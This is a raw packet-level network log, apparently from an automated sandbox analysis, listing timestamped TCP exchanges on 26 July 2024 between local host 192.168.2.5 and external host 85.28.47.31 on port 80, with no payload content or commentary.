Jul 26, 2024 20:09:04.292627096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.292643070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.292679071 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.292692900 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.293083906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.293100119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.293133020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.293143034 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.293500900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.293518066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.293534040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.293549061 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.293560982 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.293580055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.294265032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.294281960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.294297934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.294313908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.294326067 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.294346094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.295017004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.295033932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.295048952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.295061111 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.295077085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.295094013 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.320451021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.320533037 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.320612907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.320630074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.320692062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.320723057 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.320980072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.320996046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.321011066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.321032047 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.321058035 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.321058035 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.321579933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.321631908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.331397057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.331413984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.331435919 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.331460953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.331491947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.331492901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.331758022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.331773996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.331789017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.331804037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.331907988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.332727909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.332742929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.332758904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.332775116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.332787037 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.332818985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.332838058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.333147049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.333163977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.333178997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.333197117 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.333226919 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.333226919 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.347860098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.347901106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.347937107 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.347964048 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.348042011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.348058939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.348098993 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.348124027 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.348397970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.348413944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.348428965 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.348445892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.348448038 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.348469019 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.348511934 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.348511934 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.349095106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.349112034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.349127054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.349142075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.349155903 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.349158049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.349188089 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.349211931 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.350050926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.350068092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.350081921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.350097895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.350104094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.350116014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.350123882 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.350131989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.350155115 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.350173950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.351051092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.351347923 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.352040052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.352056026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.352071047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.352101088 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.352128029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.352832079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.352895021 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.352922916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.352938890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.352955103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.352971077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.352971077 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.352987051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.352993011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.353038073 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.353065014 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.353835106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.353852034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.353867054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.353882074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.353895903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.353897095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.353950977 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.354787111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.354803085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.354815960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.354831934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.354835987 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.354846001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.354856014 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.354862928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.354895115 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.354922056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.355811119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.355829000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.355843067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.355859041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.355874062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.355874062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.355896950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.355920076 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.356705904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.356723070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.356736898 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.356753111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.356755972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.356767893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.356776953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.356784105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.356806993 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.356826067 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.357625008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.357641935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.357656002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.357671976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.357678890 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.357686996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.357700109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.357743025 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.358655930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.358674049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.358688116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.358702898 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.358705997 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.358717918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.358726025 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.358733892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.358762026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.358786106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.359508038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.359524012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.359538078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.359553099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.359561920 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.359568119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.359585047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.359587908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.359613895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.359637976 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.360507011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.360522032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.360538006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.360553980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.360554934 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.360569000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.360585928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.360603094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.360603094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.360632896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.383415937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.383500099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.383709908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.383725882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.383758068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.383784056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.383856058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.383871078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.383887053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.383898020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.383903027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.383913040 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.383919001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.383933067 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.383950949 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.383966923 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.384413958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.384428978 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.384443998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.384459019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.384464025 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.384474039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.384495020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.384480000 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.384526014 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.384526014 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.384556055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.411057949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.411138058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.411227942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.411242962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.411282063 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.411309004 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.411570072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.411585093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.411598921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.411614895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.411619902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.411652088 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.411652088 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.421797037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.421859980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.421905994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.421921968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.421950102 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.421982050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.422055960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.422099113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.422748089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.422765017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.422794104 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.422818899 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.423382998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.423398972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.423413992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.423429012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.423437119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.423444033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.423460007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.423456907 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.423475027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.423482895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.423490047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.423501968 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.423521996 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.423535109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.437983036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.438039064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.438093901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.438110113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.438138008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.438163996 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.438412905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.438465118 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.442792892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.442852974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.442873001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.442888021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.442950010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.442950010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.443217993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.443265915 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.447753906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.447771072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.447817087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.447846889 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.448070049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.448086977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.448100090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.448121071 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.448159933 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.452507019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.452522993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.452565908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.452594042 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.452815056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.452831984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.452864885 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.452888966 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.457257986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.457273960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.457305908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.457334995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.457617998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.457633972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.457674980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.457701921 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.461954117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.461971998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.461986065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.462013006 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.462038040 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.462372065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.462388039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.462419987 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.462445021 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.466747999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.466763973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.466797113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.466797113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.467097998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.467113018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.467124939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.467147112 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.467170954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.471497059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.471513987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.471573114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.471832991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.471848965 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.471863985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.471887112 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.471910954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.476278067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.476294994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.476353884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.476353884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.476531029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.476547003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.476576090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.476603031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.480989933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.481009960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.481043100 CEST	49704	80	192.168.2.5	85.28.47.31
